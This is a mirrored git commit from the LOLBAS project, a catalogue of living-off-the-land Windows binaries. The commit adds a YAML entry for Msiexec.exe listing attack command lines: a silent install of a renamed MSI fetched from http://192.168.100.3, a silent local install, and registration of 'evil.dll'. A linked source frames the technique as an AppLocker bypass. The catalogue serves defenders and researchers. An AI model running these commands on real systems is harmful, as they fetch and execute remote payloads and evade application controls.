mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 12:42:19 +02:00
MD files generate from Script, and adjustments to readme
This commit is contained in:
25
yml/OSBinaries/Msiexec.yml
Normal file
25
yml/OSBinaries/Msiexec.yml
Normal file
@@ -0,0 +1,25 @@
|
||||
---
|
||||
Name: Msiexec.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: msiexec /quiet /i cmd.msi
|
||||
Description: Installs the target .MSI file silently.
|
||||
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||
Description: Installs the target remote & renamed .MSI file silently.
|
||||
- Command: msiexec /y "C:\folder\evil.dll"
|
||||
Description: Calls DLLRegisterServer to register the target DLL.
|
||||
- Command: msiexec /z "C:\folder\evil.dll"
|
||||
Description: Calls DLLRegisterServer to un-register the target DLL.
|
||||
Full Path:
|
||||
- c:\windows\system32\msiexec.exe
|
||||
- c:\windows\sysWOW64\msiexec.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||
- https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman
|
||||
|
Reference in New Issue
Block a user